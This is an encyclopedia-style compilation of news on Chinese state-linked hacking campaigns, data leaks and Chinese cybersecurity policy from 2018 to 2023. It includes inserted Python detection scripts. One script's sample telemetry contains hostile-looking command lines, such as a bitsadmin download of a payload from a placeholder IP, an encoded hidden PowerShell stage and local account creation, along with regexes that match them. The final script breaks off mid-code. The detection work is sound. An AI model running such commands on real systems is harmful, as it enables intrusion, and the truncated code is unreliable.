2023/04/26 13:17:42

Cybercrime and cyber conflicts: China

China, where many command-and-control servers are located, is repeatedly accused of intellectual property theft and a variety of other security violations, and is one of the countries most often associated with cyber threats. China is widely believed to have carried out attacks including the infiltration of the unclassified White House network reported by U.S. government officials, operations against Google, and operations against Japan during the conflict over the disputed islands.


Main article: China

Industrial espionage by China

Main article: Industrial espionage by China

2023

The world's largest credit institution, ICBC, hit by ransomware; US Treasury trading halted

On November 9, 2023, the US division of the Industrial and Commercial Bank of China (ICBC) was hit by a major cyberattack involving ransomware. As a result of the intrusion, trading in US Treasuries was disrupted. Read more here.

Malware pre-installed at the factory found in Chinese TVs

On October 4, 2023, Human Security announced that it had identified a large-scale cybercriminal campaign called Badbox originating from China. Various Android-based devices sold over the Internet ship with firmware that already contains malicious code. As a result, users can unknowingly be drawn into botnet activity. Read more here.

US, Taiwan team up to defend against China's cyber attacks

Lawmakers in the US Congress have introduced a bill that would require the Pentagon to significantly expand cybersecurity cooperation with Taiwan to protect the island from cyber threats from China. This became known on April 23, 2023. Read more here.

Previously undocumented MgBot framework used by China in spying campaigns in Africa

Symantec experts reported that the China-linked Daggerfly group has been attacking a telecommunications company in Africa since November 2022 with the aim of collecting intelligence data. This became known on April 21, 2023.

The Daggerfly campaign (the group is also tracked as Bronze Highland and Evasive Panda) uses previously undocumented plugins from the modular MgBot malware. The attackers also used a PlugX loader and abused the legitimate AnyDesk remote desktop software.

In the observed attack chains, Daggerfly conducts a living-off-the-land (LotL) attack, using BITSAdmin and PowerShell to deliver the next-stage payload, including the legitimate AnyDesk executable and a credential-harvesting utility.

The attackers then establish persistence on the victim's system by creating a local account and deploying the MgBot framework. MgBot is an actively maintained modular framework that consists of an EXE dropper, a DLL loader and plugins.

MgBot's multifunctional plugins can give attackers a significant amount of information about a compromised machine. The modules perform the following actions:

  • collecting browser data;
  • keylogging;
  • capturing screenshots;
  • recording audio;
  • enumerating Active Directory.

"All of these features allow hackers to collect a significant amount of information from victim computers. The plugin features also show that the main goal of the cybercriminals in this campaign is data collection," said Symantec[1].
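The LotL chain described above (a BITSAdmin download, an obfuscated PowerShell stage, creation of a local account, and AnyDesk started from a staging directory) lends itself to per-host correlation in process-creation telemetry. The Python script below is an added example written for this page, not Symantec's code or Daggerfly tooling; the flat log format, the hostnames, user names, IP address, paths and password, and the 30-minute/three-stage alert thresholds are all assumptions, and the event records are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample process-creation events in a flattened Sysmon Event ID 1 style:
# timestamp|host|user|parent_image|image|command_line. Not real telemetry; hosts, users,
# the IP address, the paths and the password are made up for this example.
SAMPLE_EVENTS = r"""
2022-11-14T09:12:01|HOST-A|svc_tel|cmd.exe|C:\Windows\System32\bitsadmin.exe|bitsadmin /transfer job1 /download /priority high http://198.51.100.7/anydesk.exe C:\ProgramData\anydesk.exe
2022-11-14T09:12:40|HOST-A|svc_tel|cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
2022-11-14T09:13:05|HOST-A|svc_tel|cmd.exe|C:\Windows\System32\net.exe|net user support1 P@ssw0rd! /add
2022-11-14T09:13:30|HOST-A|svc_tel|cmd.exe|C:\ProgramData\anydesk.exe|C:\ProgramData\anydesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
2022-11-14T10:45:00|HOST-B|jdoe|explorer.exe|C:\Program Files (x86)\AnyDesk\AnyDesk.exe|"C:\Program Files (x86)\AnyDesk\AnyDesk.exe"
2022-11-14T11:02:11|HOST-C|admin|cmd.exe|C:\Windows\System32\bitsadmin.exe|bitsadmin /list /allusers
"""

# Each rule names one stage of the chain and the command-line pattern that reveals it.
STAGE_RULES = [
    ("bits_download", re.compile(r"\bbitsadmin(\.exe)?\b.*(/transfer|/addfile|/download)\b", re.I)),
    ("powershell_encoded", re.compile(
        r"\bpowershell(\.exe)?\b.*(-enc(odedcommand)?\b|downloadstring|downloadfile|\biex\b)", re.I)),
    ("local_account_added", re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+(\s+\S+)?\s+/add\b", re.I)),
]
# Assumed normal install locations for the remote desktop tool.
LEGIT_RMM_PREFIXES = ("c:\\program files", "c:\\program files (x86)")


def parse_events(text):
    """Parse the pipe-separated records into dicts with a datetime timestamp."""
    events = []
    for line in text.strip().splitlines():
        ts, host, user, parent, image, cmdline = line.split("|", 5)
        events.append({"time": datetime.fromisoformat(ts), "host": host, "user": user,
                       "parent": parent, "image": image, "cmdline": cmdline})
    return events


def match_stages(event):
    """Return the chain stages a single event is evidence for (empty list if none)."""
    stages = [name for name, rx in STAGE_RULES if rx.search(event["cmdline"])]
    image = event["image"].lower()
    # AnyDesk itself is legitimate; the signal is the binary running from a staging
    # directory instead of its normal install location.
    if image.endswith("\\anydesk.exe") and not image.startswith(LEGIT_RMM_PREFIXES):
        stages.append("rmm_from_staging_dir")
    return stages


def find_chains(events, window=timedelta(minutes=30), min_stages=3):
    """Correlate stage hits per host: alert when at least `min_stages` distinct
    stages occur on one host within `window` (sliding from each hit)."""
    hits_by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        for stage in match_stages(ev):
            hits_by_host[ev["host"]].append((ev["time"], stage, ev["cmdline"]))
    alerts = []
    for host, hits in hits_by_host.items():
        for i, (t0, _, _) in enumerate(hits):
            in_window = [h for h in hits[i:] if h[0] - t0 <= window]
            stages = sorted({h[1] for h in in_window})
            if len(stages) >= min_stages:
                alerts.append({"host": host, "first_seen": t0, "last_seen": in_window[-1][0],
                               "stages": stages, "evidence": [h[2] for h in in_window]})
                break  # one alert per host is enough for the example
    return alerts


if __name__ == "__main__":
    for alert in find_chains(parse_events(SAMPLE_EVENTS)):
        print(f"{alert['host']}: {', '.join(alert['stages'])} "
              f"between {alert['first_seen']:%H:%M:%S} and {alert['last_seen']:%H:%M:%S}")
        for line in alert["evidence"]:
            print("   ", line)
```

A single hit such as bitsadmin /transfer is routine in administration, so the value lies in the correlation: HOST-B runs AnyDesk from its normal install path and HOST-C only lists BITS jobs, so neither produces an alert, while HOST-A trips four distinct stages within two minutes.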

Leak of 10 GB of data; the database is on sale for $150 thousand

A user of Breach Forums put up for sale data from Chinese military intelligence and secret documents of the Taiwanese special services, 10 GB in total. He is asking $150 thousand for the information, which became known in mid-January 2023. Read more here.

2022

China accuses NSA hackers of stealing space data from university

In early September 2022, China's National Computer Virus Emergency Response Center published a report stating that the US National Security Agency had carried out attacks on Northwestern Polytechnical University in Xi'an. The hackers were drawn by the university's programs in aeronautics and space research. Read more here.

Chinese hackers attacked Russian defense enterprises

A Chinese-speaking cyber group has been attacking defense enterprises and state agencies in Russia, Afghanistan and Eastern European countries. This was announced on August 8, 2022 by Kaspersky Lab. Read more here.

Data on 1 billion Chinese citizens put up for sale on the dark web

In early July 2022, unknown persons put up for sale on the darknet a database allegedly containing information on a billion Chinese citizens for 10 bitcoins, which is more than $190 thousand. Read more here.

Chinese cyber spies deliver malware through antivirus software

On May 25, 2022, it became known that SentinelOne, a company specializing in endpoint security, had analyzed the activity of the Chinese Moshen Dragon group. Experts compared the attackers' methods and found overlaps with those of the RedFoxtrot and Nomad Panda groups.


In early May, SentinelOne reported that the hackers were using antivirus products to side-load malicious DLLs and deliver malware to the systems of organizations, most of them in Central Asia.

"Moshen Dragon hackers regularly used antivirus software to hijack the DLL search order. The hijacked DLL was used to decrypt and load the final payload, stored in the same folder but in a different file," SentinelOne specialists explained.

SentinelOne named products from Symantec, Trend Micro, Bitdefender, McAfee and Kaspersky as the ones abused by the attackers. But only Trend Micro addressed the issue, deploying a security update via ActiveUpdate on May 19. The company's experts said in their report that they had found no evidence of the vulnerability being exploited against their consumer and business products.

Earlier, Moshen Dragon attacks on the Central Asian telecommunications sector had come to light. The hackers loaded the ShadowPad and PlugX malware onto victims' systems and also used the Gunters backdoor.[2]
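The pattern SentinelOne describes, a trusted executable sitting next to a DLL that shadows a system library, with the real payload stored encrypted in a separate file in the same folder, can be hunted for on disk. The Python scanner below is an added example for this page, not SentinelOne's code or a reproduction of the Moshen Dragon tooling. The list of commonly hijacked DLL names, the size and entropy thresholds, and the sample folder layout (a stand-in AVScanner.exe, a planted version.dll, a uniform-byte config.dat standing in for an encrypted payload, and an innocuous readme.txt) are assumptions constructed for the demonstration.

```python
import math
import tempfile
from pathlib import Path

# System DLL names that are frequently planted next to a trusted executable so that the
# loader picks them up from the application directory first. Constructed list for this
# example (an assumption), not the set SentinelOne reported.
COMMONLY_HIJACKED = {"version.dll", "wtsapi32.dll", "dbghelp.dll", "cryptbase.dll",
                     "userenv.dll", "msimg32.dll", "dwmapi.dll"}


def shannon_entropy(data):
    """Bits of entropy per byte; encrypted or compressed payloads score close to 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def scan_directory(path, min_blob_size=1024, entropy_threshold=7.0):
    """Flag a directory where an .exe sits beside a DLL whose name matches a commonly
    hijacked system DLL, and list high-entropy non-PE files in the same folder as
    candidate encrypted payloads."""
    p = Path(path)
    files = [f for f in p.iterdir() if f.is_file()]
    exes = [f.name for f in files if f.suffix.lower() == ".exe"]
    if not exes:
        return []
    findings = []
    for dll in files:
        if dll.suffix.lower() != ".dll" or dll.name.lower() not in COMMONLY_HIJACKED:
            continue
        candidates = []
        for blob in files:
            if blob.suffix.lower() in (".exe", ".dll"):
                continue
            data = blob.read_bytes()
            if len(data) >= min_blob_size:
                ent = shannon_entropy(data)
                if ent >= entropy_threshold:
                    candidates.append((blob.name, round(ent, 2)))
        findings.append({"directory": str(p), "executables": sorted(exes),
                         "hijacked_dll": dll.name, "payload_candidates": sorted(candidates)})
    return findings


def build_sample_tree(root):
    """Lay out a constructed folder mimicking the pattern: a stand-in scanner binary,
    a planted version.dll, an encrypted-looking blob and an innocuous text file."""
    d = Path(root) / "AVScanner"
    d.mkdir()
    (d / "AVScanner.exe").write_bytes(b"MZ" + b"\x00" * 2048)   # stand-in for the signed host binary
    (d / "version.dll").write_bytes(b"MZ" + b"\x00" * 512)       # stand-in for the planted loader DLL
    (d / "config.dat").write_bytes(bytes(range(256)) * 16)       # uniform byte distribution: entropy 8.0
    (d / "readme.txt").write_bytes(b"Scanner configuration notes.\n" * 64)  # low entropy, ignored
    return d


def demo():
    """Build the sample tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_directory(build_sample_tree(tmp))


if __name__ == "__main__":
    for f in demo():
        print(f"{f['directory']}: {f['hijacked_dll']} beside {f['executables']}; "
              f"payload candidates: {f['payload_candidates']}")
```

The DLL-name check on its own is noisy, since some applications legitimately ship private copies of system libraries; pairing it with a high-entropy companion file in the same directory, as the quote describes, narrows the candidates for manual review. A production version would additionally compare the DLL's signer and export table with the genuine copy in System32.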

China launched a series of hacker attacks on Russian authorities

On May 4, 2022, it became known that China had turned against Russia and launched a series of hacker attacks on Russian authorities, analysts at Google's Threat Analysis Group (TAG) reported. According to their report, the Curious Gorge group is attacking more actively than others. Read more here.

Chinese hackers attacked Ukrainian sites for cyber espionage

On April 8, 2022, it became known that on February 23, 2022, Ukrainian sites had been attacked by hackers allegedly linked to China. According to a Western intelligence spokesman, the attackers' goal was espionage. Read more here.

Chinese group Scarab attacked companies in Ukraine

The Chinese group Scarab attacked companies in Ukraine. This became known on March 28, 2022. Read more here.

China accused the United States of hacking computers to organize cyber attacks on Russia and Ukraine

China has been subjected to continuous cyber attacks since late February, in which Internet addresses in the United States were used to seize control of Chinese computers and direct them against Belarus, Russia and Ukraine. This became known on March 12, 2022.

File:Aquote1.png
CNCERT/CC monitoring showed that since the end of February, China's Internet has constantly faced cyber attacks from abroad. Foreign groups attacked Chinese users, taking control of computers in the country in order to carry out cyber attacks on Russia, Ukraine and Belarus, the newspaper quotes. - After analyzing, most of the addresses for these attacks came from the United States. Some addresses were from other countries, such as Germany and the Netherlands.
File:Aquote2.png

Cyberattacks have been a major source of tension between the United States and its allies on one side and China on the other, with the former accusing China of running a global cyber espionage campaign.

At the start of the "special operation" in Ukraine, Russia's National Coordination Center for Computer Incidents said that the threat level of cyber attacks on Russian resources was critical and recommended taking measures to strengthen the security of information resources[3].

2021

Three Chinese APT groups attacked large telecommunications companies

On August 3, 2021, it became known that a team of cybersecurity researchers Cybereason Nocturnus discovered three malicious cyber espionage campaigns aimed at hacking the networks of large telecommunications companies. Presumably, the attacks are carried out in the interests of China. Read more here.

Chinese government hackers attacked the Russian public sector

Chinese government hackers attacked Russian companies. This became known on August 3, 2021. Read more here.

China sets up cyber security centre to train military hackers

On July 30, 2021, it was reported that China was building a National Cybersecurity Center (NCC). The investment in this major project has not been disclosed. Read more here.

China allocated $40 billion for the country's cyber defense

In early July 2021, the Ministry of Industry and Information Technology of the People's Republic of China announced that it had drafted a three-year action plan for developing the country's cybersecurity sector. The plan focuses on regulating the storage, transfer and confidentiality of personal data. The ministry expects the cybersecurity sector to exceed $38.6 billion by 2023, with a compound annual growth rate of over 15%.

The ministry's document states that the share of investment in network security in key industries, including telecommunications, should reach 10% of IT investment. For key industries, the authorities recommend increasing investment in protecting network infrastructure and promoting the deployment of network security technologies, solutions and services, and for small and medium-sized enterprises, significantly increasing their network security capabilities.


The plan says that by 2023 a number of leading enterprises with operational and network security advantages are to be formed, as well as a number of small and medium-sized enterprises in new areas such as the Internet of Things (IoT), the industrial Internet of Things, Internet-connected vehicles and "smart cities."

File:Aquote1.png
China has been building almost from scratch legal mechanisms in the field of cybersecurity since 2017 and is now at a late stage of their creation, - said EqualOcean analyst Ivan Platonov. - With the Data Security Act coming into effect in September, it is crucial to develop a comprehensive strategy that pushes the nation's businesses to increase their data security spending.
File:Aquote2.png

Platonov also noted that as of July 2021, China accounts for only about 1% of global spending on cybersecurity services. With the rapid growth of the cloud/SaaS industry, cybersecurity investment is becoming increasingly important for the country.[4]

In terms of its capabilities in cyberspace, China is 10 years behind the United States

According to a report[5] by the International Institute for Strategic Studies (IISS), in terms of cyberspace capabilities China will not be able to catch up with the United States in the next ten years. China's cyber power is undermined by security problems and insufficient analysis of the intelligence it obtains[6].

The researchers ranked countries for their cyberspace capabilities, ranging from the level of their digital economy and the maturity of their intelligence and security functions to the level of integration of cyber facilities with military operations.

China, like Russia (see Cybercrime and cyber conflicts: Russia), has proven its capability in conducting offensive cyber operations (cyber espionage, intellectual property theft and disinformation campaigns) against the United States and its allies. Still, both countries' capabilities are held back by comparatively low levels of cybersecurity compared to their adversaries, according to the IISS. For this reason the top tier of the ranking contains only the United States, while China, Russia, Great Britain, Australia, Canada, France and Israel were placed in the second tier. The third tier includes India, Indonesia, Japan, Malaysia, the DPRK, Iran and Vietnam.

According to the report, Beijing's focus on "content security" (restricting politically disruptive information in the Chinese segment of the Internet) may have reduced its attention to securing the physical networks over which that information is transmitted. The IISS also suggested that China's intelligence analysis is "less mature" than that of the Five Eyes intelligence alliance (the US, UK, Canada, Australia and New Zealand), as it is driven by ideology and "increasingly confused for political purposes" by Communist Party leaders.

China's People's Liberation Army may be behind attack on Japanese space agency

China's People's Liberation Army is suspected of cyber attacks on hundreds of targets in Japan, including on the space agency and defense enterprises[7].

In 2016, the Japan Aerospace Exploration Agency (JAXA) was hit by a cyber attack. According to the Japanese public broadcaster NHK, Tokyo police identified a PRC citizen who had rented several servers in Japan allegedly used in the attacks. The suspect has since left the country, but on Tuesday, April 20, his case was nevertheless referred to the prosecutor's office.

The man, in his 30s, is a computer engineer and a member of the Chinese Communist Party. According to investigators, he rented servers five times in Japan under false names. The man passed the server ID and credentials to a Chinese hacker group known as Tick.

Another Chinese citizen also rented several servers in Japan under false names. It is assumed that the man acted on the orders of Unit 61419, a structure inside the People's Liberation Army engaged in carrying out cyber attacks.

According to the Tokyo police, the People's Liberation Army ordered a series of cyber attacks on Japanese organizations from Tick, which affected about two dozen companies and research institutes.

According to representatives of JAXA, unknown persons did gain unauthorized access to the networks of the space agency, but did not cause any damage (for example, data leaks).

According to information security expert Iwai Hiroki, Tick is one of the private hacker groups working for the People's Liberation Army and the Chinese special services. The group began operations in the early 2000s and specializes in complex and well-designed attacks on aerospace research organizations.

Chinese cyber spies steal 5G data around the world

Chinese cyber spies began attacking telecommunications companies in Asia, Europe and the United States last fall in order to steal 5G-related information[8].

According to McAfee[9], in March 2021 the cyber spies were luring employees of telecommunications companies to a malicious site disguised as a Huawei careers page. The phishing site asks visitors to install a Flash software update hosted on the malicious site. The malicious file downloads and installs a .NET backdoor that communicates with the attackers' remote infrastructure through a Cobalt Strike beacon.

According to experts, with the help of phishing attacks, cyber spies are trying to gain a foothold in the internal networks of telecommunications companies. Experts have recorded attacks against telecommunications companies in Southeast Asia, Europe and the United States, but the group also shows "great interest in telecommunications companies in Germany, Vietnam and India."

Experts associated the tactics, techniques and procedures used in this campaign with the Chinese groups Red Delta and Mustang Panda. While the experts suggest that Red Delta and Mustang Panda may be the same group, they currently have no further evidence.

"We assume that the motivation for this particular campaign is related to the ban on Chinese technologies in the global deployment of 5G," the experts said.

Some countries targeted by the Mustang Panda group have already made public statements about their intention to ban or restrict Huawei's participation in the rollout of national 5G networks, such as the United States, Spain and Italy. However, attacks have also been observed in countries where Huawei has already signed similar contracts.

2020

Taiwan accuses Beijing of cyber attacks on government agencies

Hacker groups allegedly backed by the Chinese government are carrying out cyber attacks to infiltrate the networks of Taiwanese government departments and steal confidential data on citizens as part of ongoing attempts to influence democratic society. This was announced in August by Liu Chia-zun, deputy head of the cybersecurity division of Taiwan's Investigation Bureau[10].

According to the official, hackers "for a long time" have been hacking into the systems of Taiwanese companies providing information services to government agencies in an attempt to obtain state information and personal data of citizens.

Four groups are behind the attacks - Blacktech, Taidoor, MustangPanda and APT40. Due to the fact that hackers carefully hide traces of their activities, experts have not yet been able to determine what data was stolen, with the exception of one case when about 6 thousand government emails fell into the hands of attackers, Liu said.

He also added that Taiwan has investigated roughly 10 cases involving cyberattacks by Chinese hackers since 2018. According to the head of the country's Cybersecurity Department, Jian Hong-wei, the Chinese authorities carry out about 30 million cyber attacks per month in Taiwan.

US does not want to lay communication cable with China due to the threat of cyber espionage

On June 22, 2020, it became known that the United States does not want to lay a communication cable with China due to the threat of cyber espionage. The cable will allegedly allow Chinese intelligence services to gain access to American data. Read more here.

PRC will update cybersecurity rules for critical infrastructure

From June 1, 2020, an updated cybersecurity verification system will come into force in China, designed to strengthen the country's national cybersecurity. The rules will affect both Chinese and foreign providers of network products and services for strategic industries such as communications, radio and television, power, finance, transportation, rail and civil aviation. This became known on April 29, 2020.

The Cyberspace Administration of China, together with 11 relevant departments, published a document entitled "Measures for Cybersecurity Review" on April 27. According to China Daily, it spells out obligations to comply with the Cybersecurity Law, which has been in force in China since June 1, 2017.

The introduction of this verification system will help eliminate potential risks, ensure public safety and security of national cyberspace, and also contribute to the healthy and orderly development of the information industry, the authors of the document say.

According to the rules, operators of critical information infrastructure purchasing network products and services (if these products and services may affect national security) must undergo a national security audit.

The document also obliges operators to assess potential cyber risks associated with the products and services they purchase. If potential threats are detected, such as illegal control and damage to key IT infrastructure, leakage, loss and damage to key data, operators are required to contact the cybersecurity review bureau for further verification.

The PRC Cybersecurity Law is the main regulatory act governing Internet security in the PRC. It regulates the collection, storage and processing of user data by providers of network products and services, and determines the procedure and specifics for ensuring the security of information infrastructure in strategically important sectors[11].

CIA suspected of 11-year cyber espionage against China

The Chinese information security company Qihoo 360 published a report linking the US Central Intelligence Agency (CIA) to a long-term cyber espionage campaign targeting Chinese industrial and government organizations. This became known on March 4, 2020. The campaign ran from September 2008 to June 2019, and most of the targets were located in Beijing, Guangdong and Zhejiang, the researchers said. Read more here.

2019

China again uses the Great Cannon for DDoS attacks

According to AT&T Cybersecurity analysts, the Chinese authorities have reactivated the Great Cannon, a powerful DDoS tool last used two years earlier[12][13]. Read more here.

Is China behind the attacks on Australia's parliament?

In the fall of 2019, Reuters reported, citing at least five informed sources who wished to remain anonymous, that Australian intelligence had established that China was behind the cyberattacks on the country's parliament and three largest political parties ahead of the May elections. According to the sources, in March of that year the Australian Signals Directorate established that the attacks had been carried out by the PRC Ministry of State Security. The Australian authorities prepared a report, including information obtained by the Department of Foreign Affairs, but intend to keep it secret to avoid a deterioration in trade and economic relations between the two states.

The Australian government did not bring any charges against China, and Prime Minister Scott Morrison's office declined to answer questions from Reuters. The PRC Ministry of Foreign Affairs, for its part, rejects any accusations of cybercriminal activity, noting that the Internet is teeming with all kinds of theories that cannot be proved.

Chinese hackers hack HPE, IBM and six more of the world's largest IT providers

Hackers working for the Chinese Ministry of State Security broke into the networks of eight of the world's largest technology service providers, Reuters wrote in June 2019. Their goal was to steal the commercial secrets of these companies' customers, according to an agency source familiar with the situation. The hacking campaign was named Cloud Hopper[14].

The hackers compromised at least eight providers: Hewlett Packard Enterprise (HPE), IBM, Fujitsu, Tata Consultancy Services, NTT Data, Dimension Data, Computer Sciences Corporation and DXC Technology (formerly Computer Sciences). Cloud Hopper was known earlier, but until now only HPE and IBM had been named among the victims.

Reuters was also able to determine which companies were customers of these providers. The list includes Swedish telecommunications giant Ericsson, US shipbuilding company Huntington Ingalls Industries and travel booking system Sabre.

According to Robert Hannigan, former director of the UK's Government Communications Headquarters (GCHQ) and now chairman of the information security firm BlueVoyant, the effect of the series of Cloud Hopper attacks has been devastating. The Chinese government denies any involvement.

US NSA malicious code interception

On May 10, 2019, it became known that Chinese cyber intelligence operators had managed to capture NSA malicious code and use it against US allies.


Based on the timing of these attacks and hints found in the code, Symantec researchers concluded that the Chinese cyber specialists did not steal the NSA hacking tools but captured them during an attack on their own systems.

Symantec does not name China directly in its publication, instead using the designations "Buckeye group" and APT3. However, the US Department of Justice and other organizations dealing with cybersecurity use these names for a structure acting as a contractor for the PRC Ministry of State Security and headquartered in Guangzhou. In 2017, the US Department of Justice brought charges against three Chinese hackers who were named as members of Buckeye/APT3.

For the NSA, Symantec likewise uses the name Equation Group. That is what Kaspersky Lab called the creators of a framework for developing cyber weapons at the beginning of 2015. There is a steady consensus in the global cybersecurity industry that Equation is a group of cyber specialists in the service of the US National Security Agency.

In August 2016, an unknown group, the Shadow Brokers, began publishing exploits and other malicious tools belonging to the Equation Group, either stolen or "leaked" by an insider. All of these exploits were released in April 2017 and have since been used several times by various cybercriminals (recall the global WannaCry ransomware epidemic).

Meanwhile, according to Symantec, modified versions of two tools from this set, EternalSynergy and DoublePulsar, were used by APT3 in its attacks as early as March 2016. Thus, these tools reached the Chinese hackers before their "leak."

Symantec experts indicate that these tools attacked commercial and scientific structures in five countries - Belgium, Luxembourg, Vietnam, the Philippines and Hong Kong. At least one attack was aimed at a large telecommunications network; as a result, attackers could access hundreds of thousands or even millions of private messages.

The company noted that this is the first time it has seen someone else's malicious code captured "on the fly" and turned against the allies of its alleged creators. At the same time, APT3 did not attack infrastructure in the United States with these exploits, probably assuming that protective measures were in place and not wanting to give the defenders a chance to catch the exploits in use. Moreover, APT3 had earlier repeatedly attacked US infrastructure using other means, sometimes very successfully.

The leak of the Equation exploits had far-reaching consequences for the NSA: the entire arsenal accumulated over the years had to be handed over to Microsoft immediately so that it could release fixes for the vulnerabilities Equation had used. The NSA also had to wind down several key anti-terrorism programs.

Moreover, the leaked tools quickly ended up in the hands of North Korea and Russia. The high-profile attacks on the shipping company Maersk, the British healthcare system and Ukrainian civilian infrastructure are associated with this.

However, the main conclusion from this situation is that the US intelligence services demonstrated, and not for the first time, an inability to keep their cyber weapons secure. The question has again arisen in US intelligence circles whether it makes sense to develop a cyber weapon if it cannot be prevented from falling into the hands of adversaries.

File:Aquote1.png
Information about the existence of Stuxnet and cyber weapons as such in 2011 slipped out only because, due to an error in the code, this "warworm" went beyond the perimeter of the target area of ​ ​ use. Cyber ​ ​ weapons are a "double-edged sword," and, as this story proves, no one is immune from the fact that it will not be used against its own developers. Worst of all, however, is that with its destructive potential, comparable only to the WMD, there are still no official international agreements governing its application. This does not bode well for the world.
File:Aquote2.png

According to Symantec, after the US Department of Justice brought charges against alleged members of Buckeye/APT3 in 2017, the group ceased its activity. However, attacks using the same modified tools continued until September 2018[15].

2018

NYT: Chinese cyber spies intercepted diplomatic correspondence of EU countries for three years

Cyber spies penetrated the European Union's diplomatic communications network and for three years intercepted thousands of cables on various issues, including concern about the unpredictable actions of US President Donald Trump's administration, attempts to confront Russia and China, and the risks associated with the resumption of Iran's nuclear program, The New York Times reported[16].

The newspaper had 1,100 confidential documents at its disposal, including memoranda of conversations with the leaders of Saudi Arabia, Israel and other countries, messages from European diplomats about Russia's actions, reports on private negotiations with Chinese President Xi Jinping, and conversations with American officials about the meeting of US and Russian presidents Donald Trump and Vladimir Putin at the Helsinki summit in July 2018.

Judging by the techniques used, an elite hacker unit of the Chinese People's Liberation Army may be behind the hack, according to experts from the information security company Area 1, which discovered the leak. Using phishing, the attackers infiltrated Cyprus' national systems and stole passwords that gave them access to the entire EU database, they said. They then copied cables from the secure networks and posted them on a publicly accessible site they had created.

According to the publication, besides the EU systems the attackers also compromised the networks of the UN, the American Federation of Labor and Congress of Industrial Organizations (AFL-CIO) and the ministries of finance and foreign affairs in countries around the world. In total, the cybercriminals attacked more than a hundred organizations and institutions, but many of them did not suspect the hacking until recently.

The National Security Agency is still looking into the "European archive." Experts have repeatedly warned the EU about the use of outdated systems and the risks of hacker attacks from China, Iran and other countries. However, in response to warnings, officials usually shrugged, the newspaper writes.

As European officials emphasized, confidential materials and messages labeled "secret" and "top secret" are processed in a different way than documents that cybercriminals managed to intercept. They also noted that a EC3IS network is being developed for confidential diplomatic correspondence, and another network, Zeus, is provided for communications in capitals such as Moscow and Beijing for delegations of EU member states.

Chinese "cybersecurity standards" aimed at fighting competitors

The PRC government is using some 300 so-called "national cybersecurity standards" to keep foreign technology companies out of the Chinese market. Such conclusions are contained in a report by the American Center for Strategic and International Studies (CSIS)[17].

The above standards are documents developed by the PRC National Technical Committee for Standardization in the Field of Information Security. They contain various recommendations for the design and functionality of a number of products from the point of view of cybersecurity. The recommendations cover products such as routers, firewalls and even software.

Some standards describe methods for giving the government access to sensitive data of Chinese citizens processed by certain services or devices. Some standards deal with acceptable encryption algorithms, while others describe the requirements for data transmission technologies outside the country.

According to the Chinese authorities, at present the standards are only advisory in nature. Still, many are mandatory for Chinese companies, according to the CSIS report. Moreover, Chinese companies cannot purchase products from vendors that are not certified according to certain standards, since as a result, the resulting product will not comply with the recommendations. This will significantly complicate the attempts of foreign manufacturers to get into the Chinese market, experts are sure.

"In order to meet some standards, foreign firms will have to redesign their products specifically for the Chinese market due to the inconsistency of these standards with the international one," CSIS experts write.

Chinese hackers attacked space satellites

On June 20, 2018, antivirus vendor Symantec announced a large-scale cyber attack, organized by Chinese hackers, on space, defense and telecommunications companies in the United States and Asia.

According to the experts, a group called Thrip was behind the cyber attacks on satellite operators, as well as on a number of telecommunications companies and defense contractors. Its goal was espionage and the interception of data from civilian and military communication channels.

Symantec recorded a cyber attack on satellite operators in the United States and Asia

It is noted that the attackers managed to install malware on computers used to monitor and control satellites. This could have allowed them to change the position of satellites in orbit and interfere with the transmission of data to the ground.

Symantec CEO Greg Clark said the attackers used standard operating-system tools, which is why the victims did not notice any anomalies. The hackers acted with great care, penetrated the networks and were detected only with the help of artificial-intelligence tooling capable of identifying and tracking their actions, he added.
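"Standard operating-system tools" is the living-off-the-land pattern: the binaries are legitimate, so signature-based defenses stay silent and the anomaly is in who runs them, from where, and how. The following is an added example, not code from the page or from Symantec's Thrip investigation, of the kind of baseline check a defender can run over process-creation telemetry. The host and account names, the dual-use tool list and the events themselves are constructed assumptions.

```python
"""Flag dual-use admin tooling that does not fit the expected admin baseline.

Added example: events, host/account names and the tool list are constructed
assumptions for illustration, not data from Symantec's Thrip investigation.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    parent: str    # parent process image path
    image: str     # process image path
    cmdline: str


# Assumed baseline: the only account and host expected to drive remote admin.
ADMIN_ACCOUNTS = {"svc-itops"}
JUMP_HOSTS = {"jump01"}
# Legitimate tools that are equally useful to an intruder (assumption).
DUAL_USE = {"psexec.exe", "powershell.exe", "wmic.exe", "winscp.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_PS = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_event(ev: ProcessEvent) -> list[str]:
    """Return the reasons an event looks like tool abuse (empty list = benign)."""
    image = basename(ev.image)
    if image not in DUAL_USE:
        return []
    reasons: list[str] = []
    if ev.user not in ADMIN_ACCOUNTS:
        reasons.append(f"{image} run by non-admin account {ev.user}")
    if image == "psexec.exe" and ev.host not in JUMP_HOSTS:
        reasons.append(f"psexec launched from non-jump host {ev.host}")
    if image == "powershell.exe" and ENCODED_PS.search(ev.cmdline):
        reasons.append("encoded PowerShell command line")
    if basename(ev.parent) in OFFICE_PARENTS:
        reasons.append(f"spawned by Office process {basename(ev.parent)}")
    return reasons


def hunt(events: list[ProcessEvent]) -> list[tuple[ProcessEvent, list[str]]]:
    """Keep only events with at least one reason, preserving input order."""
    out = []
    for ev in events:
        reasons = flag_event(ev)
        if reasons:
            out.append((ev, reasons))
    return out


# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    ProcessEvent("jump01", "svc-itops", r"C:\Windows\System32\cmd.exe",
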